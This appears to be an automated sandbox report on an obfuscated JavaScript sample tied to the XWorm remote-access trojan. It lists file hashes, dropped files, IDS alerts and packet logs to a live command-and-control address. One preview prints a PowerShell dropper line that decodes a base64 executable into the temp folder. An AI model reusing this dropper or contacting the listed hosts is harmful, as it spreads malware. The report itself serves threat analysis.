                                            AS45671-NET-AUWholesaleServicesProviderAUmpsl.elfGet hashmaliciousUnknownBrowse
                                            • 203.132.12.191
                                            hgfs.x86.elfGet hashmaliciousUnknownBrowse
                                            • 185.36.225.128
                                            BRAINNN.ps1Get hashmaliciousXWormBrowse
                                            • 178.173.236.10
                                            BRAINN.exeGet hashmaliciousXWormBrowse
                                            • 178.173.236.10
                                            Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeGet hashmaliciousGuLoader, RemcosBrowse
                                            • 103.47.146.161
                                            affiling_SKM_C45825021309430.exeGet hashmaliciousGuLoader, RemcosBrowse
                                            • 172.94.101.157
                                            jklmips.elfGet hashmaliciousUnknownBrowse
                                            • 202.60.94.185
                                            nabarm.elfGet hashmaliciousUnknownBrowse
                                            • 178.173.252.226
                                            cbr.m68k.elfGet hashmaliciousMiraiBrowse
                                            • 117.20.6.93
                                            cbr.x86.elfGet hashmaliciousMiraiBrowse
                                            • 202.60.94.37
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\user\AppData\Local\Temp\X1Client.exeBRAINNN.ps1Get hashmaliciousXWormBrowse
                                              C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeBRAINNN.ps1Get hashmaliciousXWormBrowse
                                                Process:C:\Windows\System32\wscript.exe
                                                File Type:ASCII text, with very long lines (58101), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):58210
                                                Entropy (8bit):5.311922928337348
                                                Encrypted:false
                                                SSDEEP:768:sAWqaE3BhczLgCEgVhwJU4+EL0+OElRXZIE2u/f4Xk44YLRbi9VNB3dx79XEpijZ:QExhdTmwJ/L0+OElRXZIEOJpSZ
                                                MD5:6BCBE08006939EB8D186C96528A9524A
                                                SHA1:DA68EB0C6984699578359EE75ADA5C77A30536E1
                                                SHA-256:FDB6F7A93FA053B1CB45CE82504CE7A803F1C9C0986F99BF3895C9F52B1C9255
                                                SHA-512:6E2822E3E0201ECDA684C595175777AFC46BF45B5855A964046E8D7D586D77B8024D3FE5E6EF66BE16E3B206A6F1E434155A8EE57603D6F42E69240D2812B60E
                                                Malicious:true
                                                Reputation:low
                                                Preview:$QAADCCDGDHFTRR=[IO.Path]::Combine($env:TEMP,"JXCJKXCJHKJHXCJHKXCXCJHK.exe")..[IO.File]::WriteAllBytes($QAADCCDGDHFTRR,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFANSJTuAAAAAAAAAAAOAAIgALATAAAH4AAAAoAAAAAAAACuAAAABAAAAAIAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAAAgAQAABAAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAACxGAABPAAAAAMAAALoFAAAAAAAAAAAAAAAAAAAAAAAAAAABAAwAAADQRQAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAACAAAAAAAAAAAAAAAAEAAAEgAAAAAAAAAAAAAADNZWiY6XE8I2B8AAAAgAAAAIAAAAAQAAAAAAAAAAAAAAAAAAEAAAOAudGV4dAAAAER7AAAAQAAAAHwAAAAkAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAAC6BQAAAMAAAAAGAAAAoAAAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAEAAAAADgAAAAAgAAAKYAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAAAEAAAIAAACoAAAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                Process:C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):942
                                                Entropy (8bit):5.350509596383769
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MIHK5HKlYHKh3oPtHo6hAHKzeR
                                                MD5:DA5963CF74F11C4E8986C7841A16F3B5
                                                SHA1:39938349691D476017B747A8E121E352E7F12822
                                                SHA-256:85B5E4583A88128D99B13C8E3CF94999F5F10D35ED2D0DC98BE5C7C919673768
                                                SHA-512:A3AF48A1B5A791CDB62BC2D6277903B0C3EC2EEF5786CC52D3B1443655654A44EB1B4FFB05FFA227E17E2D78F50D028F720C0C569ADCBB70351BDE3D2B29CE69
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                Process:C:\Windows\System32\wscript.exe
                                                File Type:ASCII text, with very long lines (58101), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):58210
                                                Entropy (8bit):5.311922928337348
                                                Encrypted:false
                                                SSDEEP:768:sAWqaE3BhczLgCEgVhwJU4+EL0+OElRXZIE2u/f4Xk44YLRbi9VNB3dx79XEpijZ:QExhdTmwJ/L0+OElRXZIEOJpSZ
                                                MD5:6BCBE08006939EB8D186C96528A9524A
                                                SHA1:DA68EB0C6984699578359EE75ADA5C77A30536E1
                                                SHA-256:FDB6F7A93FA053B1CB45CE82504CE7A803F1C9C0986F99BF3895C9F52B1C9255
                                                SHA-512:6E2822E3E0201ECDA684C595175777AFC46BF45B5855A964046E8D7D586D77B8024D3FE5E6EF66BE16E3B206A6F1E434155A8EE57603D6F42E69240D2812B60E
                                                Malicious:false
                                                Preview:$QAADCCDGDHFTRR=[IO.Path]::Combine($env:TEMP,"JXCJKXCJHKJHXCJHKXCXCJHK.exe")..[IO.File]::WriteAllBytes($QAADCCDGDHFTRR,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFANSJTuAAAAAAAAAAAOAAIgALATAAAH4AAAAoAAAAAAAACuAAAABAAAAAIAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAAAgAQAABAAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAACxGAABPAAAAAMAAALoFAAAAAAAAAAAAAAAAAAAAAAAAAAABAAwAAADQRQAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAACAAAAAAAAAAAAAAAAEAAAEgAAAAAAAAAAAAAADNZWiY6XE8I2B8AAAAgAAAAIAAAAAQAAAAAAAAAAAAAAAAAAEAAAOAudGV4dAAAAER7AAAAQAAAAHwAAAAkAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAAC6BQAAAMAAAAAGAAAAoAAAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAEAAAAADgAAAAAgAAAKYAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAAAEAAAIAAACoAAAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):1.1940658735648508
                                                Encrypted:false
                                                SSDEEP:3:NlllulJnp/p:NllU
                                                MD5:BC6DB77EB243BF62DC31267706650173
                                                SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                Malicious:false
                                                Preview:@...e.................................X..............@..........
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):43520
                                                Entropy (8bit):5.85881161602782
                                                Encrypted:false
                                                SSDEEP:384:Tn07iHzfrw+BNPMRTPfckQn2ki/ftcRg2/+QNa95V4doERUrT0h+glcoCL78LY09:TciQqPGkke21/fm7xJRUrOw78LvaD8
                                                MD5:2FDE7F3FFB6B753F4F38D56D9B5A7CC6
                                                SHA1:D1DB9A01CDA04BA123DD98FD84675BCEC94BDAD4
                                                SHA-256:6C97ECC2C61D32ED69642E73D95768D47CFF87F2E6F71D3561ED5B23FFEDE4E5
                                                SHA-512:0DD9A010AADE521D8450E30FC9F465498A977AE26E74E3725F00540E276387EE979D6E8608D9FACA124521413A55AC45836A0EE05FFF8F225BBA198B14099799
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 54%
                                                Joe Sandbox View:
                                                • Filename: BRAINNN.ps1, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....N..........."...0..~...(...........@... ....@.. ....................... ............`.................................,F..O....................................E..8............................................................@..H...........3YZ&:\O...... ... ..................@....text...D{...@...|...$.............. ..`.rsrc...............................@..@.................................... ..`.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):29
                                                Entropy (8bit):3.598349098128234
                                                Encrypted:false
                                                SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                                                MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                                                SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                                                SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
                                                SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
                                                Malicious:false
                                                Preview:....### explorer ###..[WIN]r
                                                Process:C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):43520
                                                Entropy (8bit):5.85881161602782
                                                Encrypted:false
                                                SSDEEP:384:Tn07iHzfrw+BNPMRTPfckQn2ki/ftcRg2/+QNa95V4doERUrT0h+glcoCL78LY09:TciQqPGkke21/fm7xJRUrOw78LvaD8
                                                MD5:2FDE7F3FFB6B753F4F38D56D9B5A7CC6
                                                SHA1:D1DB9A01CDA04BA123DD98FD84675BCEC94BDAD4
                                                SHA-256:6C97ECC2C61D32ED69642E73D95768D47CFF87F2E6F71D3561ED5B23FFEDE4E5
                                                SHA-512:0DD9A010AADE521D8450E30FC9F465498A977AE26E74E3725F00540E276387EE979D6E8608D9FACA124521413A55AC45836A0EE05FFF8F225BBA198B14099799
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 54%
                                                Joe Sandbox View:
                                                • Filename: BRAINNN.ps1, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....N..........."...0..~...(...........@... ....@.. ....................... ............`.................................,F..O....................................E..8............................................................@..H...........3YZ&:\O...... ... ..................@....text...D{...@...|...$.............. ..`.rsrc...............................@..@.................................... ..`.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Mar 19 12:19:31 2025, mtime=Wed Mar 19 12:19:31 2025, atime=Wed Mar 19 12:19:31 2025, length=43520, window=hide
                                                Category:dropped
                                                Size (bytes):1043
                                                Entropy (8bit):4.957357162364939
                                                Encrypted:false
                                                SSDEEP:12:8I26q4yjMWC2dauRaRgK/GuTh1AjAtmfdwE1sjeawuLEzE44t2YZ/elFlSJmZmV:8PQyLBbR6gK/vTh1UAUfd5o72TqyFm
                                                MD5:4278F79CCECA6509387D3F325054EF38
                                                SHA1:C585D5740EF35166B01F8E56C3AA4701A1F26DC6
                                                SHA-256:6B29BD751D5128C77729A4506D08F84A7C80A9626D50B867243148CB073704AA
                                                SHA-512:88E62AFD132227F5AC7F10AB553BF15BCB06ED8AB8C772FFAB19F830F91E110AAB18064430A459795A54AE38513F48869C044AA84A0B529BE0BAF2A380358C03
                                                Malicious:false
                                                Preview:L..................F.... ..................................................:..DG..Yr?.D..U..k0.&...&......vk.v......}|....z.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^sZfj...........................%..A.p.p.D.a.t.a...B.P.1.....sZcj..Local.<......CW.^sZej....b.........................L.o.c.a.l.....N.1.....sZmj..Temp..:......CW.^sZmj....l......................c.T.e.m.p.....f.2.....sZpj .X1Client.exe..J......sZpjsZpj...........................W..X.1.C.l.i.e.n.t...e.x.e.......]...............-.......\...........8o,......C:\Users\user\AppData\Local\Temp\X1Client.exe..).....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.X.1.C.l.i.e.n.t...e.x.e.........|....I.J.H..K..:...`.......X.......377142...........hT..CrF.f4... ..x)p?....0.......hT..CrF.f4... ..x)p?....0..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...1SPS..mD..pH.H@..=
                                                File type:ASCII text, with very long lines (4299), with no line terminators
                                                Entropy (8bit):5.937969564573934
                                                TrID:
                                                  File name:obfuscated (1).js
                                                  File size:4'299 bytes
                                                  MD5:b361b76556d7d6120193ebad93c39820
                                                  SHA1:6103ae7cea2892ebe20e1c3fde9c8b95313b1e8e
                                                  SHA256:1d7e4c2ea862244bdc81943bdb7c4993b811854e0bf3628f5f3d89d85ba67e03
                                                  SHA512:14aaad92cdc5cfb1b0064b56b449912e711811f3f284f447c0329a05e3522b7a278eee87c9446c25aa98b10ef44633a57d53c099a70b1875ddff98cfdc852921
                                                  SSDEEP:96:VbVUInAB/ZWKJmMlup4WxKIXnY8mzZUiK2mTmUvIF:7UInANlupBxK/7UiKdTmYIF
                                                  TLSH:04910898FE8470948BB313970F4F146DD279C5D1365ECAEED148F6C8FE80AA0D21B620
                                                  File Content Preview:function a(){var r=['v1nJCMLWDc5tAgvSBa','W4lcNCkxW64ngmoZwCkcW6lcVaa','rg93BMXVywqGzMfPBgvKihDPDgGGC3rHDhvZoIa','rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU','ACkUdHfzeGlcS3ldImorW4fbBa','r8o2W69AWQulW7tdG8k+WQnGW7ipf8ojj8o0W61wv8o0W4hcLgbhESoCW
                                                  Icon Hash:68d69b8bb6aa9a86

                                                  Download Network PCAP: filteredfull

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2025-03-19T14:19:22.506333+01002018856ET MALWARE Windows executable base64 encoded1176.65.144.380192.168.2.449713TCP
                                                  2025-03-19T14:20:42.005149+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.449732178.173.236.107000TCP
                                                  • Total Packets: 124
                                                  • 7000 undefined
                                                  • 80 (HTTP)
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Mar 19, 2025 14:19:21.502388000 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:21.507307053 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:21.507421017 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:21.508008003 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:21.512732983 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.249393940 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.249485016 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.249521017 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.249548912 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.249548912 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.249556065 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.249591112 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.249628067 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.249643087 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.249644041 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.249644041 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.249663115 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.249700069 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.249733925 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.249746084 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.249746084 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.249746084 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.249769926 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.249877930 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.249877930 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.255508900 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.255539894 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.255614042 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.377470016 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.377527952 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.377531052 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.377540112 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.377553940 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.377612114 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.377612114 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.377803087 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.377865076 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.377876043 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.377887011 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.377907991 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.377907991 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.377952099 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.378388882 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.378451109 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.378464937 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.378475904 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.378488064 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.378499031 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.378526926 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.378537893 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.379179955 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.379196882 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.379209042 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.379220009 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.379230022 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.379245043 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.379245043 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.379261971 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.379300117 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.380114079 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.380125046 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.380137920 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.380150080 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.380170107 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.380181074 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.380244017 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.383214951 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.383249044 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.383272886 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.383301020 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.506333113 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.506346941 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.506356955 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.506366968 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.506376982 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.506405115 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.506441116 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.506628990 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.506747961 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.506788015 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.506797075 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.506850958 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.506998062 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.507008076 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.507018089 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.507026911 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.507036924 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.507047892 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.507057905 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.507081985 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.507081985 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.507147074 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:22.601231098 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.601252079 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:22.602262020 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:27.259624958 CET8049713176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:27.260035992 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:27.650463104 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:27.655668974 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:27.655751944 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:27.656965971 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:27.661613941 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.405307055 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.405323982 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.405334949 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.405345917 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.405358076 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.405424118 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.405435085 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.405445099 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.405447006 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:28.405447006 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:28.405831099 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.405843019 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.406064987 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:28.406064987 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:28.406064987 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:28.410531044 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.410545111 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.410557032 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.410619020 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:28.454550028 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:28.530250072 CET8049717176.65.144.3192.168.2.4
